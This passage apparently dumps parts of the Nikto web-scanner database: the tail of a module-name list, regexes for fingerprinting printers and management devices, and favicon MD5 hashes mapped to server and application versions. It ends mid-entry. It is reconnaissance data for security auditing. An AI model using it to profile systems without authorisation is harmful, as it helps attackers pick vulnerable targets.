\"516179\",\"xml_parser\"\n\"516180\",\"xml_sitemap\"\n\"516181\",\"xmlcontent\"\n\"516182\",\"xmlrpc_api\"\n\"516183\",\"xmlrpctester\"\n\"516184\",\"xmlsitemap\"\n\"516185\",\"xmlsitemap_aliases\"\n\"516186\",\"xmlsync\"\n\"516187\",\"xmltokml\"\n\"516188\",\"xmpp\"\n\"516189\",\"xmpp_server\"\n\"516190\",\"xmppclient\"\n\"516191\",\"xmppframework\"\n\"516192\",\"xoops_import\"\n\"516193\",\"xor_encryption\"\n\"516194\",\"xrds_simple\"\n\"516195\",\"xs_activity\"\n\"516196\",\"xsasg\"\n\"516197\",\"xsend\"\n\"516198\",\"xslt_book\"\n\"516199\",\"xspf_playlist\"\n\"516200\",\"xss_injector\"\n\"516201\",\"xssfilter\"\n\"516202\",\"xstandard\"\n\"516203\",\"xstatic\"\n\"516204\",\"xstatistics\"\n\"516205\",\"xstory\"\n\"516206\",\"xtracker\"\n\"516207\",\"yagm\"\n\"516208\",\"yahoo_bbauth\"\n\"516209\",\"yahoo_geocoding_api\"\n\"516210\",\"yahoo_terms\"\n\"516211\",\"yahoo_weather\"\n\"516212\",\"yahoo_weather_forecast\"\n\"516213\",\"yahoomeme\"\n\"516214\",\"yahoopipes\"\n\"516215\",\"yamli\"\n\"516216\",\"yamm\"\n\"516217\",\"yatt\"\n\"516218\",\"yboss\"\n\"516219\",\"yelp\"\n\"516220\",\"yilp_api\"\n\"516221\",\"ymap\"\n\"516222\",\"ymaps\"\n\"516223\",\"youtube\"\n\"516224\",\"youtube_api\"\n\"516225\",\"youtube_cck\"\n\"516226\",\"youtube_filter\"\n\"516227\",\"yoxview\"\n\"516228\",\"yr_verdata\"\n\"516229\",\"yshout\"\n\"516230\",\"yshout2\"\n\"516231\",\"ystock\"\n\"516232\",\"yubikey\"\n\"516233\",\"yui\"\n\"516234\",\"yui_button\"\n\"516235\",\"yui_calendar\"\n\"516236\",\"yui_datatable\"\n\"516237\",\"yui_editor\"\n\"516238\",\"yui_form\"\n\"516239\",\"yui_logger\"\n\"516240\",\"yui_tabview\"\n\"516241\",\"yui_treeview\"\n\"516242\",\"yuimenu\"\n\"516243\",\"z3950\"\n\"516244\",\"zadministration\"\n\"516245\",\"zeitgeist\"\n\"516246\",\"zemanta\"\n\"516247\",\"zen_panels\"\n\"516248\",\"zencart\"\n\"516249\",\"zend\"\n\"516250\",\"zend_feed\"\n\"516251\",\"zendesk\"\n\"516252\",\"zenify\"\n\"516253\",\"zenophile\"\n\"516254\",\"zenophile_extras\"\n\"516255\",\"zensursula\"\n\"516256\",\"ziki\"\n\"516257\",\"zimbra\"\n\"516258\",\"zina\"\n\"516259\",\"zipcode\"\n\"516260\",\"zipcode_redirect\"\n\"516261\",\"zippy_images\"\n\"516262\",\"zipsads\"\n\"516263\",\"zombiekiller\"\n\"516264\",\"zoomify\"\n\"516265\",\"zws\"\n"
  },
  {
    "path": "nikto/program/databases/db_embedded",
    "content": "#VERSION,2.004\n#######################################################################\n# File Source: https://cirt.net\n# (c) 2001 Chris Sullo, All Rights Reserved.\n# This file may only be distributed and used with the full Nikto package.\n# This file may not be used with any software product without written permission from\n# Chris Sullo (csullo@gmail.com)\n#\n# Note:\n# By submitting updates to this file you are transferring any and all copyright\n# interest in the data to Chris Sullo so it can modified, incorporated into this product\n# relicensed or reused.\n#######################################################################\n# Notes:\n# NiktoDB 1.00\n#######################################################################\n\"nikto_id\",\"uri\",\"match\",\"model\",\"message\"\n\"300000\",\"/\",\"^(.*office.xerox.com.*Model=)([A-Za-z0-9+]+)(&.*)$\",\"$2\",\"Host seems to be a Xerox printer, model:\"\n\"300001\",\"/\",\"^(.*HEAD_NODE.*)([Xx][Ee][Rr][Oo][Xx][ A-Z0-9a-z]+)(['\\\"]\\);)\",\"$2\",\"Host seems to be a Xerox printer, model:\"\n\"300002\",\"/\",\"^([Pp][Hh][Aa][Ss][Ee][Rr][ A-Z0-9a-z]+)(<\\/title>)\",\"$1\",\"Host seems to be a Xerox printer, model:\"\n\"300003\",\"/\",\"^(var prd=['\\\"])([XxWw][EeOo][Rr][OoKk][XxCc][ A-Z0-9a-z]+)(['\\\"];)\",\"$2\",\"Host seems to be a Xerox printer, model:\"\n\"300004\",\"/hp/device/this.LCDispatcher\",\"^(.*<title>)([Hh][Pp] [Ll][Aa][Ss][Ee][Rr][Jj][Ee][Tt][ A-Z0-9a-z]+)(<\\/title>.*)$\",\"$2\",\"Host seems to be an HP Laserjet printer, model:\"\n\"300005\",\"/hp/device/this.LCDispatcher\",\"^(.*<title>)([Hh][Pp] [Cc][Oo][Ll][Oo][Rr] [Ll][Aa][Ss][Ee][Rr][Jj][Ee][Tt][ A-Z0-9a-z]+)(<\\/title>.*)$\",\"$2\",\"Host seems to be an HP Laserjet printer, model:\"\n\"300006\",\"/hp/device/this.LCDispatcher\",\"^([Hh][Pp] [Cc][Oo][Ll][Oo][Rr] [Ll][Aa][Ss][Ee][Rr][Jj][Ee][Tt][ A-Z0-9a-z]+)(<\\/title>.*)$\",\"$1\",\"Host seems to be an HP Laserjet printer, model:\"\n\"300007\",\"/hp/device/this.LCDispatcher\",\"^([Hh][Pp] [Ll][Aa][Ss][Ee][Rr][Jj][Ee][Tt][ A-Z0-9a-z]+)(<\\/title>.*)$\",\"$1\",\"Host seems to be an HP Laserjet printer, model:\"\n\"300008\",\"/hmstat.htm\",\"^(var spcs=\\[['\\\"])([Ww][Oo][Rr][Kk][Cc][ A-Z0-9a-z]+)(['\\\"].*)$\",\"$2\",\"Host seems to be a Xerox printer, model:\"\n\"300009\",\"/SoundBridgeStatus.html\",\"(SoundBridge is running software version )([0-9.]*)$\",\"$2\",\"Host seems to be a Roku SoundBridge media device version:\"\n\"300010\",\"/eng/start/StatPtrGen.htm\",\"(^.*PrinterGen\\[0\\]; sData\\[count\\+\\+\\] \\= \\\")([\\S]*)(\\\";)\",\"$2\",\"Host seems to be a Kyocera printer, model:\"\n\"300011\",\"/cab/top.shtml\",\"(^.*<span class=\\\"product_name\\\">)([A-Z0-9]*)(<\\/span><\\/td>)\",\"$2\",\"Host seems to be a Canon printer, model:\"\n\"300012\",\"/home.asp\",\"(^.*<td><b class=\\\"is\\\"><center>)([\\._\\-A-Z0-9a-z\\(\\)\\/ ]*)(<\\/center><\\/td><\\/tr>)\",\"$2\",\"Host seems to be a Cyclades terminal server, version:\"\n\"300013\",\"/\",\"(^serverName=\\\")([A-Za-z0-9\\-\\.]+)(\\\";$)\",\"$2\",\"Host seems to be an HP iLO device, hostname:\"\n\"300014\",\"/\",\"(^<html><head><title>)(Remote Access Controller)(</title>$)\",\"$2\",\"Host seems to be a Dell\"\n\"300015\",\"/\",\"(<title>)(Sunny WebBox)(</title>)\",\"$2\",\"Host seems to be an SMA America \"\n"
  },
  {
    "path": "nikto/program/databases/db_favicon",
    "content": "#VERSION,2.010\n#######################################################################\n# File Source: https://cirt.net\n# (c) 2001 Chris Sullo, All Rights Reserved.\n# This file may only be distributed and used with the full Nikto package.\n# This file may not be used with any software product without written permission from\n# Chris Sullo (csullo@gmail.com)\n#\n# Note:\n# By submitting updates to this file you are transferring any and all copyright\n# interest in the data to Chris Sullo so it can modified, incorporated into this product\n# relicensed or reused.\n#######################################################################\n# Notes:\n# NiktoDB 1.0\n# Example to get the md5hash: $ md5sum favicon.ico\n#######################################################################\n\"nikto_id\",\"md5hash\",\"description\"\n\"500017\",\"4987120f4fb1dc454f889e8c92f6dabe\",\"Google Web Server\"\n\"500108\",\"c0dc2e457e05c2ce0a99886ec1048d77\",\"Platform Computing Corporation Platform Management Console Version v2.0\"\n\"500109\",\"92d0841188d40b6fef294cf53a8addd7\",\"cPanel cpsrvd webmail server\"\n\"500110\",\"9afa5d60e5ef15dc75d7662e418cac72\",\"QNAP TurboNAS\"\n\"500111\",\"5f09cded07bb864fd9b3d2dd72b5418e\",\"TwonkyServer Premium 7.0.x\"\n\"500112\",\"773669c6c97d65ac5ede9e8ea6b47116\",\"Plex Media Server 0.9.x\"\n\"500113\",\"46b742e6ba5d7ac03f13b312601c113f\",\"XBMC Media Center 12.x (Web Interface)\"\n\"500114\",\"88733ee53676a47fc354a61c32516e82\",\"Magento Go CMS\"\n\"500115\",\"6d2adf39ca320265830403dfc030033a\",\"Liferay Portal\"\n\"500117\",\"297d726681297cbf839f43a125e5c9b4\",\"ZNC IRC Bouncer (Web Interface)\"\n\"500118\",\"d577e9569381685b30feae22484c8344\",\"ZNC IRC Bouncer (Web Interface)\"\n# Sync from: https://github.com/pvdl/favicon-database/blob/master/favicondb.csv\n\"500151\",\"28c34462a074c5311492759435549468\",\"AContent\"\n\"500153\",\"705d63d8f6f485bd40528394722b5c22\",\"Atmail\"\n\"500154\",\"9f500a24ccbdda88cf8ae3ec7b61fc40\",\"Atomic CMS\"\n\"500155\",\"5b816961f19da96ed5a2bf15e79093cb\",\"ATutor\"\n\"500157\",\"f51425ace97f807fe5840c4382580fd5\",\"Beehive Forum 1.x\"\n\"500158\",\"eb05f77bf80d66f0db6b1f682ff08bee\",\"Biscom Delivery Server\"\n\"500159\",\"5d27143fc38439baba39ba5615cbe9ef\",\"Cascade Server\"\n\"500160\",\"0c53ef3d151cbac70a8486dd1ebc8b25\",\"Chamilo e-learning system\"\n\"500161\",\"9939a032a9845e4d931d14e08f5a6c7c\",\"Citrix XenApp Logon\"\n\"500162\",\"6c633b9b92530843c782664cb3f0542d\",\"ClipBucket\"\n\"500163\",\"a59c6fead5d55050674f327955df3acb\",\"CouchPotato 2.x\"\n\"500164\",\"107579220745d3b21461c23024d6c4a3\",\"D-Link\"\n\"500165\",\"c86974467c2ac7b6902189944f812b9a\",\"Domain Technology Control 0.17.x-0.24.x\"\n\"500167\",\"d9aa63661d742d5f7c7300d02ac18d69\",\"Dreambox WebControl\"\n\"500168\",\"a4819787db1dabe1a6b669d5d6df3bfd\",\"Drupal 2.x-4.x\"\n\"500170\",\"b6341dfc213100c61db4fb8775878cec\",\"Drupal 7.x\"\n\"500171\",\"0a99a23f6b1f1bddb94d2a2212598628\",\"Maraschino\"\n\"500172\",\"51b916bdaf994ce73d3e5e6dfe2a46ee\",\"Feng Office 2.3\"\n\"500173\",\"d134378a39c722e941ac25eed91ca93b\",\"FreePBX\"\n\"500174\",\"45210ace96ce9c893f8c27c5decab10d\",\"Fritz!\"\n\"500178\",\"835306119474fefb6b38ae314a37943a\",\"Horde Agora (Forum)\"\n\"500179\",\"b64a1155b80e0b06272f8b842b83fa57\",\"Horde Ansel (Photo Manager)\"\n\"500180\",\"0e6a6ed665a9669b368d9a90b87976a9\",\"Horde Gollem (File Manager)\"\n\"500182\",\"6c18a6e983f64b6a6ed0a32c9e8a19b6\",\"HP ProCurve Webserver\"\n\"500183\",\"6acfee4c670580ebf06edae40631b946\",\"Iomega StorCenter\"\n\"500184\",\"1f9c39ef3f740eebb046c900edac4ba5\",\"Iomega StorCenter ix2-200\"\n\"500185\",\"37a99d2ddea8b49f701db457b9a8ffed\",\"Iomega StorCenter ix4-200d\"\n\"500186\",\"e7dce6ac6d8713a0b98407254ca33f80\",\"Iomega StorCenter ix4-300d\"\n\"500187\",\"f08d232927ab8f2c661616b896928233\",\"Iomega StorCenter px2-300d\"\n\"500188\",\"9d203fbb74eabf67f48b965ba5acc9a6\",\"Iomega StorCenter px4-300d\"\n\"500189\",\"fbd140da4eff02b90c9ebcbdb3736322\",\"Iomega StorCenter px4-300r\"\n\"500190\",\"fd3f689b804ddb7bfab53fdf32bf7c04\",\"Iomega StorCenter px6-300d\"\n\"500191\",\"8dfab2d881ce47dc41459c6c0c652bcf\",\"Iomega StorCenter px12-350r\"\n\"500192\",\"66dcdd811a7d8b1c7cd4e15cef9d4406\",\"Iomega StorCenter px12-400r\"\n\"500193\",\"a7fe149a9f2582f38576d14d9b1f0f55\",\"LaCie Dashboard\"\n\"500197\",\"2ba9b777483da0a6a8b29c4ab39a10b2\",\"MagicMail\"\n\"500199\",\"701bb703b31f99da18251ca2e557edf0\",\"Mantis Bug Tracker 1.2.9-1.2.15\"\n\"500202\",\"d4af3be33d952c1f98684d985019757c\",\"Moodle 2.0 : Magazine\"\n\"500203\",\"b88c0eedc72d3bf4e86c2aa0a6ba6f7b\",\"NAS4Free 9.0\"\n\"500205\",\"11abb4301d06dccc36d1b5f6dcad093e\",\"ntop 3.3.6-5.0.1\"\n\"500206\",\"b9d28bd6822d2e09e01aa0af5d7ccc34\",\"ocPortal 9.0.5\"\n\"500207\",\"eec3051d5c356d1798bea1d8a3617c51\",\"Octopress\"\n\"500208\",\"9c34a7481ba0c153bb3e2a10e0ea811e\",\"OpenWebif\"\n\"500209\",\"49bf194d1eccb1e5110957d14559d33d\",\"OTRS\"\n\"500211\",\"d361075db94bb892ff3fb3717714b2da\",\"phpMyBackupPro\"\n\"500212\",\"a456dd2bae5746beb68814a5ac977048\",\"phpSysInfo 3.0.7\"\n\"500213\",\"6e0c5b7979e9950125c71341e0960f65\",\"phpSysInfo 3.0.8-3.0.12\"\n\"500214\",\"ddcc65196f0bc63a90c885bd88ecbb81\",\"phpSysInfo 3.0.12-3.0.20, 3.1.0-3.1.4\"\n\"500216\",\"ba4bfe5d1deb2b4410e9eb97c5b74c9b\",\"Puppet Node Manager\"\n\"500217\",\"368c15ac73f0096aa3daff8ff6f719f8\",\"Redaxscript 1.0-1.2.1\"\n\"500218\",\"6d85758acb4f4baa4d242ba451c91026\",\"Redmine x, Request Tracker\"\n\"500220\",\"228ba3f6d946af4298b080e5c934487c\",\"Roundcube Webmail 0.6-0.7 : Default, 0.8-0.9 : Classic, 0.8-0.9 : Larry\"\n\"500223\",\"ed8cf53ef6836184587ee3a987be074a\",\"Ruckus\"\n\"500224\",\"f6c5f5e8857ecf561029fc5da005b6e3\",\"Sophos Email Appliance\"\n\"500229\",\"f682dbd4d0a18dd7699339b8adb28c0f\",\"QNAP TurboNAS 3.8.x : Admin\"\n\"500230\",\"7ff45523a7ee9686d3d391a0a27a0b4f\",\"QNAP TurboNAS 4.0.x\"\n\"500231\",\"a967c8bfde9ea0869637294b679b7251\",\"Squid Proxy Server\"\n\"500232\",\"bc18566dcc41a0ff503968f461c4995a\",\"Subrion CMS\"\n\"500233\",\"531e652a15bc0ad59b6af05019b1834a\",\"Synology DSM 4.2\"\n\"500234\",\"0ec12e5820517d3b62e56b9a8f1ee5bc\",\"TradingEye\"\n\"500236\",\"300b5c3f134d7ec0bca862cf113149d8\",\"TVersity\"\n\"500238\",\"8718c2998236c796896b725f264092ee\",\"Typo3 6.1\"\n\"500239\",\"7350c3f75cb80e857efa88c2fd136da5\",\"Ushahidi\"\n\"500240\",\"2e5e985fe125e3f8fca988a86689b127\",\"VISEC\"\n\"500241\",\"d90cc1762bf724db71d6df86effab63c\",\"vtiger CRM\"\n\"500242\",\"b14353fafda7c90fb1a2a214c195de50\",\"webERP\"\n\"500243\",\"18fe76b96d4eae173bf439a9712fa5c1\",\"WikiWebHelp\"\n\"500244\",\"e44d22b74f7ee4435e22062d5adf4a6a\",\"Wordpress 2.x\"\n\"500245\",\"3ead5afa19537170bb980924397b70d6\",\"Wordpress 3.x : Twenty Ten\"\n\"500246\",\"28a122aa74f6929b0994fc544555c0b1\",\"Wordpress 3.2-3.x : Twenty Eleven\"\n\"500248\",\"e9dd9992d222d67c8f6a4704d2c88bdd\",\"Zarafa WebAccess\"\n\"500249\",\"c126f7e761813946fea2e90ff7ddb838\",\"Zenoss Core\"\n# End sync from: https://github.com/pvdl/favicon-database/blob/master/favicondb.csv\n\"500501\",\"6399cc480d494bf1fcd7d16c42b1c11b\",\"penguin\"\n\"500502\",\"09b565a51e14b721a323f0ba44b2982a\",\"Google web server\"\n\"500503\",\"506190fc55ceaa132f1bc305ed8472ca\",\"SocialText\"\n\"500504\",\"2cc15cfae55e2bb2d85b57e5b5bc3371\",\"PHPwiki (1.3.14) / gforge (4.6.99+svn6496) - wiki\"\n\"500505\",\"389a8816c5b87685de7d8d5fec96c85b\",\"XOOPS cms\"\n\"500506\",\"f1876a80546b3986dbb79bad727b0374\",\"NetScreen WebUI or 3Com Router\"\n\"500507\",\"226ffc5e483b85ec261654fe255e60be\",\"Netscape 4.1\"\n\"500508\",\"b25dbe60830705d98ba3aaf0568c456a\",\"Netscape iPlanet 6.0\"\n\"500509\",\"41e2c893098b3ed9fc14b821a2e14e73\",\"Netscape 6.0 (AOL)\"\n\"500510\",\"a28ebcac852795fe30d8e99a23d377c1\",\"SunOne 6.1\"\n\"500511\",\"71e30c507ca3fa005e2d1322a5aa8fb2\",\"Apache on Redhat\"\n\"500512\",\"d41d8cd98f00b204e9800998ecf8427e\",\"Zero byte favicon\"\n\"500513\",\"dcea02a5797ce9e36f19b7590752563e\",\"Parallels Plesk \"\n\"500514\",\"6f767458b952d4755a795af0e4e0aa17\",\"Yahoo!\"\n\"500515\",\"5b0e3b33aa166c88cee57f83de1d4e55\",\"DotNetNuke (http://www.dotnetnuke.com)\"\n\"500516\",\"7dbe9acc2ab6e64d59fa67637b1239df\",\"Lotus-Domino\"\n\"500517\",\"fa54dbf2f61bd2e0188e47f5f578f736\",\"Wordpress\"\n\"500518\",\"6cec5a9c106d45e458fc680f70df91b0\",\"Wordpress - obsolete version\"\n\"500519\",\"81ed5fa6453cf406d1d82233ba355b9a\",\"E-zekiel\"\n\"500520\",\"ecaa88f7fa0bf610a5a26cf545dcd3aa\",\"3-byte invalid favicon\"\n\"500521\",\"c1201c47c81081c7f0930503cae7f71a\",\"vBulletin forum\"\n\"500522\",\"edaaef7bbd3072a3a0c3fb3b29900bcb\",\"Powered by Reynolds Web Solutions (Car sales CMS)\"\n\"500523\",\"d99217782f41e71bcaa8e663e6302473\",\"Apache on Red Hat/Fedora\"\n\"500524\",\"a8fe5b8ae2c445a33ac41b33ccc9a120\",\"Arris Touchstone Device\"\n\"500525\",\"d16a0da12074dae41980a6918d33f031\",\"ST 605\"\n\"500526\",\"befcded36aec1e59ea624582fcb3225c\",\"SpeedTouch\"\n\"500527\",\"e4a509e78afca846cd0e6c0672797de5\",\"i3micro VRG\"\n\"500528\",\"3541a8ed03d7a4911679009961a82675\",\"status.net\"\n\"500529\",\"fa2b274fab800af436ee688e97da4ac4\",\"Etherpad\"\n\"500530\",\"83245b21512cc0a0e7a67c72c3a3f501\",\"OpenXPKI\"\n\"500531\",\"85138f44d577b03dfc738d3f27e04992\",\"Gitweb\"\n\"500532\",\"70625a6e60529a85cc51ad7da2d5580d\",\"SSLstrip \"\n\"500533\",\"99306a52c76e19e3c298a46616c5899c\",\"aMule (2.2.2)\"\n\"500534\",\"31c16dd034e6985b4ba929e251200580\",\"Stephen Turner Analog (6.0)\"\n\"500535\",\"2d4cca83cf14d1adae178ad013bdf65b\",\"Ant docs manual (1.7.1)\"\n\"500536\",\"032ecc47c22a91e7f3f1d28a45d7f7bc\",\"Ant docs (1.7.1) / libjakarta-poi-java (3.0.2)\"\n\"500537\",\"31aa07fe236ee504c890a61d1f7f0a97\",\"apache2 (2.2.9) docs-manual\"\n\"500538\",\"c0c4e7c0ac4da24ab8fc842d7f96723c\",\"xsp (1.9.1)\"\n\"500539\",\"d6923071afcee9cebcebc785da40b226\",\"autopsy (2.08)\"\n\"500540\",\"7513f4cf4802f546518f26ab5cfa1cad\",\"axyl (2.6.0)\"\n\"500541\",\"de68f0ad7b37001b8241bce3887593c7\",\"b2evolution (2.4.2)\"\n\"500542\",\"140e3eb3e173bfb8d15778a578a213aa\",\"bmpx (0.40.14)\"\n\"500543\",\"4f12cccd3c42a4a478f067337fe92794\",\"cacti (0.8.7b)\"\n\"500544\",\"c0533ae5d0ed638ba3fb3485d8250a28\",\"CakePHP (1.1.x)\"\n\"500545\",\"66b3119d379aee26ba668fef49188dd3\",\"cakephp (1.2.x-1.3x)\"\n\"500546\",\"09f5ea65a2d31da8976b9b9fd2bf853c\",\"caudium (1.4.12)\"\n\"500547\",\"f276b19aabcb4ae8cda4d22625c6735f\",\"cgiirc (0.5.9)\"\n\"500548\",\"a18421fbf34123c03fb8b3082e9d33c8\",\"chora2 (2.0.2) \"\n\"500549\",\"23426658f03969934b758b7eb9e8f602\",\"chronicle (2.9) theme-steve\"\n\"500550\",\"75069c2c6701b2be250c05ec494b1b31\",\"chronicle (2.9) theme-blog.mail-scanning.com\"\n\"500551\",\"27c3b07523efd6c318a201cac58008ba\",\"cimg (1.2.0.1) \"\n\"500552\",\"ae59960e866e2730e99799ac034eacf7\",\"webcit (7.37)\"\n\"500553\",\"2ab2aae806e8393b70970b2eaace82e0\",\"couchdb (0.8.0-0.9.1)\"\n\"500554\",\"ddd76f1cfe31499ce3db6702991cbc45\",\"cream (0.41)\"\n\"500555\",\"74120b5bbc7be340887466ff6cfe66c6\",\"cups (1.3.9) - doc\"\n\"500556\",\"abeea75cf3c1bac42bbd0e96803c72b9\",\"doc-iana-20080601\"\n\"500557\",\"3ef81fad2a3deaeb19f02c9cf67ed8eb\",\"dokuwiki (0.0.20080505) \"\n\"500558\",\"e6a9dc66179d8c9f34288b16a02f987e\",\"Drupal CMS (5.10) \"\n\"500559\",\"bba9f1c29f100d265865626541b20a50\",\"dtc (0.28.10) \"\n\"500560\",\"171429057ae2d6ad68e2cd6dcfd4adc1\",\"ebug-http (0.31)\"\n\"500561\",\"f6e9339e652b8655d4e26f3e947cf212\",\"eGroupWare (1.0.0.009, 1.4.004-2) (/phpgwapi/templates/idots/images/favicon.ico)\"\n\"500562\",\"093551287f13e0ee3805fee23c6f0e12\",\"freevo (1.8.1) \"\n\"500563\",\"56753c5386a70edba6190d49252f00bb\",\"gallery (1.5.8)\"\n\"500564\",\"54b299f2f1c8b56c8c495f2ded6e3e0b\",\"garlic-doc (1.6) \"\n\"500565\",\"857281e82ea34abbb79b9b9c752e33d2\",\"gforge (4.6.99+svn6496) - webcalendar\"\n\"500566\",\"27a097ec0dbffb7db436384635d50415\",\"gforge (4.6.99+svn6496) - images\"\n\"500567\",\"0e14c2f52b93613b5d1527802523b23f\",\"gforge (4.6.99+svn6496) \"\n\"500568\",\"c9339a2ecde0980f40ba22c2d237b94b\",\"glpi (0.70.2)\"\n\"500569\",\"db1e3fe4a9ba1be201e913f9a401d794\",\"gollem (1.0.3)\"\n\"500570\",\"921042508f011ae477d5d91b2a90d03f\",\"gonzui (1.2+cvs20070129) \"\n\"500571\",\"ecab73f909ddd28e482ababe810447c8\",\"gosa (2.5.16.1)\"\n\"500572\",\"c16b0a5c9eb3bfd831349739d89704ec\",\"gramps (3.0.1)\"\n\"500573\",\"63d5627fc659adfdd5b902ecafe9100f\",\"gsoap (2.7.9l) \"\n\"500574\",\"462794b1165c44409861fcad7e185631\",\"hercules (3.05) \"\n\"500575\",\"3995c585b76bd5aa67cb6385431d378a\",\"horde-sam (0.1+cvs20080316) - silver\"\n\"500576\",\"ee3d6a9227e27a5bc72db3184dab8303\",\"horde-sam (0.1+cvs20080316) - graphics\"\n\"500577\",\"7cc1a052c86cc3d487957f7092a6d8c3\",\"horde (3.2.1) - graphics/tango\"\n\"500578\",\"5e99522b02f6ecadbb3665202357d775\",\"hplip (2.8.7) - installer\"\n\"500579\",\"39308a30527336e59d1d166d48c7742c\",\"Hewlett-Packard HPLIP (2.8.7) - doc\"\n\"500580\",\"43d4aa56dc796067b442c95976a864fd\",\"hunchentoot (0.15.7) \"\n\"500581\",\"32bf63ac2d3cfe82425ce8836c9ce87c\",\"ikiwiki (2.56ubuntu1)\"\n\"500582\",\"f567fd4927f9693a7a2d6cacf21b51b6\",\"Horde IMP (4.1.4 - 4.1.6, also used in Horde Groupware Webmail 1.0.1))\"\n\"500583\",\"919e132a62ea07fce13881470ba70293\",\"Horde Groupware Webmail 1.0.1 (Ingo Theme, 1.1.5)\"\n\"500584\",\"ed7d5c39c69262f4ba95418d4f909b10\",\"jetty (5.1.14)\"\n\"500585\",\"6900fab05a50a99d284405f46e5bc7f6\",\"k3d (0.6.7.0) \"\n\"500586\",\"24d1e355c00e79dc13b84d5455534fe7\",\"kdelibs (3.5.10-4.1.4) \"\n\"500587\",\"8ab2f1a55bcb0cac227828afd5927d39\",\"kdenetwork (4.1.4)\"\n\"500588\",\"54667bea91124121e98da49e55244935\",\"kolab-webadmin (2.1.0-20070510)\"\n\"500589\",\"a5b126cdeaa3081f77a22b3e43730942\",\"Horde Groupware Webmail 1.0.1 (Kronolith Theme, 2.1.8)\"\n\"500590\",\"d00d85c8fb3a11170c1280c454398d51\",\"ktorrent (3.1.2) \"\n\"500591\",\"fa21ab1b1e1b4c9516afbd63e91275a9\",\"lastfmproxy (1.3b) \"\n\"500592\",\"663ee93a41000b8959d6145f0603f599\",\"ldap-account-manager (2.3.0) \"\n\"500593\",\"ea84a69cb146a947fac2ac7af3946297\",\"boost (1.34.1) \"\n\"500594\",\"eb3e307f44581916d9f1197df2fc9de3\",\"flac (1.2.1) \"\n\"500595\",\"669bc10baf11b43391294aac3e1b8c52\",\"libitpp (4.0.4)\"\n\"500596\",\"b8fe2ec1fcc0477c0d0f00084d824071\",\"lucene (2.3.2) \"\n\"500597\",\"12225e325909cee70c31f5a7ab2ee194\",\"ramaze-ruby (0.3.9.1) \"\n\"500598\",\"6be5ebd07e37d0b415ec83396a077312\",\"ramaze-ruby (0.3.9.1) - dispatcher\"\n\"500599\",\"20e208bb83f3eeed7c1aa8a6d9d3229d\",\"libswarmcache-java (1.0RC2+cvs20071027)\"\n\"500600\",\"5f8b52715c08dfc7826dad181c71dec8\",\"mahara (1.0.4)\"\n\"500601\",\"ebe293e1746858d2548bca99c43e4969\",\"Mantis Bug Tracker (1.1.2, /bugs/images/favicon.ico)\"\n\"500602\",\"0d42576d625920bcd121261fc5a6230b\",\"mathomatic (14.0.6)\"\n\"500603\",\"f972c37bf444fb1925a2c97812e2c1eb\",\"mediatomb (0.11.0)\"\n\"500604\",\"f5f2df7eec0d1c3c10b58960f3f8fb26\",\"Horde Groupware Webmail 1.0.1 (Mnemo Theme, 2.1.2) \"\n\"500605\",\"933a83c6e9e47bd1e38424f3789d121d\",\"Moodle (1.8.2, 1.9.x, multiple default themes) \"\n\"500606\",\"b6652d5d71f6f04a88a8443a8821510f\",\"Moodle (1.8.2, 1.9.x, Cornflower Theme, /theme/cornflower/favicon.ico)\"\n\"500607\",\"06b60d90ccfb79c2574c7fdc3ac23f05\",\"movabletype-opensource (4.2~rc4)\"\n\"500608\",\"21d80d9730a56b26dc9d252ffabb2987\",\"mythplugins (0.21.0+fixes18722) \"\n\"500609\",\"81df3601d6dc13cbc6bd8212ef50dd29\",\"Horde Groupware Webmail 1.0.1 (Nag Theme, 2.1.4)\"\n\"500610\",\"1c4201c7da53d6c7e48251d3a9680449\",\"nagios (3.0.2)\"\n\"500611\",\"28015fcdf84ca0d7d382394a82396927\",\"nanoblogger (3.3)\"\n\"500612\",\"868e7b460bba6fe29a37aa0ceff851ba\",\"netmrg (0.20)\"\n\"500613\",\"0b2481ebc335a2d70fcf0cba0b3ce0fc\",\"ntop (3.3)\"\n\"500614\",\"c30bf7e6d4afe1f02969e0f523d7a251\",\"nulog (2.0)\"\n\"500615\",\"9a8035769d7a129b19feb275a33dc5b4\",\"ocsinventory-server (1.01)\"\n\"500616\",\"75aeda7adbd012fa93c4ae80336b4f45\",\"parrot (0.4.13) - docs\"\n\"500617\",\"70777a39f5d1de6d3873ffb309df35dd\",\"pathological (1.1.3)\"\n\"500618\",\"82d746eb54b78b5449fbd583fc046ab2\",\"perl-doc-html (5.10.0)\"\n\"500619\",\"90c244c893a963e3bb193d6043a347bd\",\"phpgroupware (0.9.16.012) \"\n\"500620\",\"4b30eec86e9910e663b5a9209e9593b6\",\"phpldapadmin (1.1.0.5)\"\n\"500621\",\"02dd7453848213a7b5277556bcc46307\",\"phpmyadmin (2.11.8.1) - pmd \"\n\"500622\",\"d037ef2f629a22ddadcf438e6be7a325\",\"phpmyadmin (2.11.8.1)\"\n\"500623\",\"8190ead2eb45952151ab5065d0e56381\",\"pootle (1.1.0)\"\n\"500624\",\"ba84999dfc070065f37a082ab0e36017\",\"prewikka (0.9.14)\"\n\"500625\",\"0f45c2c79ebe90d6491ddb111e810a56\",\"python-cherrypy (2.3.0-3.0.2)\"\n\"500626\",\"e551b7017a9bd490fc5b76e833d689bf\",\"MoinMoin (1.7.1)\"\n\"500627\",\"275e2e37fc7be50c1f03661ef8b6ce4f\",\"myghty (1.1)\"\n\"500628\",\"68b329da9893e34099c7d8ad5cb9c940\",\"myghty (1.1) - zblog \"\n\"500629\",\"5488c1c8bf5a2264b8d4c8541e2d5ccd\",\"turbogears (1.0.4.4) - genshi/elixir\"\n\"500630\",\"6927da350550f29bc641138825dff36f\",\"python-werkzeug (0.3.1) - docs \"\n\"500631\",\"e3f28aab904e9edfd015f64dc93d487d\",\"python-werkzeug (0.3.1) - cupoftee-examples\"\n\"500632\",\"69f8a727f01a7e9b90a258bc30aaae6a\",\"quantlib-refman-html (0.9.0)\"\n\"500633\",\"b01625f4aa4cd64a180e46ef78f34877\",\"quickplot (0.8.13)\"\n\"500634\",\"af83bba99d82ea47ca9dafc8341ec110\",\"qwik (0.8.4.4ubuntu2)\"\n\"500635\",\"e9469705a8ac323e403d74c11425a62b\",\"roundcube (0.1.1)\"\n\"500636\",\"7f57bbd0956976e797b4e8eebdc6d733\",\"selfhtml (8.1.1)\"\n\"500637\",\"69acfcb2659952bc37c54108d52fca70\",\"solr (1.2.0) - docs\"\n\"500638\",\"ffc05799dee87a4f8901c458f7291d73\",\"solr (1.2.0) - admin\"\n\"500639\",\"aa2253a32823c8a5cba8d479fecedd3a\",\"sork-forwards-h3 